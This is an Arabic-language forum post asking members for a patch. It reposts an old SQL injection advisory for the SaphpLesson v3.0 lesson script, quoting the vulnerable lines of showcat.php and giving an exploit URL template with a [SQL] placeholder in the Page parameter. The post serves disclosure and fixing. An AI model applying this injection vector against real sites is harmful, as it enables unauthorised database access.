ثغرة خطيرة في سكربت الدروس الأخير
السلام عليكم ورحمة الله
الحمد لله على كل حال ملف واحد مصاب لو يجد لنا الأخوان حل في ترقيعها وهي ثغرة من نوع SQL Injection
المصدر
http://www.securityfocus.com/archive.../30/0/threaded
تحياتي لكم
كود PHP:
//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
-------------------------------------------------------------------------------
Line 19'/'23 of showcat.php ||
---------------<? ||
$forumid = intval($_GET["forumid"]); ||
||
$Page = intval($_GET["Page"]); ||
||
$tit = mysql_query("select Title,CatID from forums where id=$forumid"); ||
?>-----------------------------------------------------------------------------
ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#
/*'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/*
END
___________K-S-A______________
|ــــــTeam AL-GaRNiـــــــــــ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|ـــــgamr-14@hotmail.comـــــــ|
|ـــــــــm-o-t@msn.comـــــــــ|
__________________
شـــكراَ سوالف ســـوفت ,,, قمة المواقع العربية بلا منازع
--|| سبحان الله والحمد لله والله أكـبر ||--